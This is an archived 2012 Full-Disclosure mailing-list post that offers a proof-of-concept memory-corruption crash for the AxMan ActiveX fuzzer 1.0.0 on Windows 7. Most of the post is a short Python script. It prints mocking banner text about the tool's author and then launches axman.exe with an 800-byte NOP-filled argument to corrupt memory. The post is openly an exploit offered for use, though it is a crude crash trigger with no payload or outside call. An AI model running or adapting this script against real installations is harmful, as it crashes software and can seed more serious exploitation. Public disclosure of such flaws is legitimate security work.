[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <CADe7mMcMWRbDD57antxM3J0C-a7qJxi9fxmEOZ5WBwZ-MCY5iw@mail.gmail.com>
Date: Sat, 28 Jul 2012 17:21:17 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: AxMan ActiveX fuzzing <== Memory Corruption PoC
Exploit Title: AxMan ActiveX fuzzing <== Memory Corruption PoC
Crash : http://imageshack.us/f/217/axman.jpg/
Date: July 28, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://digitaloffense.net/tools/axman/
version : 1.0.0
Tested on: windows 7 SP1
========================================================
Crash The Exploiter
Lame HD Moore fuzzer Memory Corruption
By Awsome coolkaveh
-------------------------------------------------------------------------------------------------------
import os
import win32api
crash = " Crash The Exploiter "
lame=" Lame HD Moore fuzzer Memory corruption "
awsome=" By Awsome coolkaveh "
print
print
print
print crash
print
print lame
print
print awsome
print
print
print
print
exploit = ("\x90" *800)
win32api.WinExec((r'"D:\axman-1.0.0\bin\axman.exe" %s') % exploit, 1)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists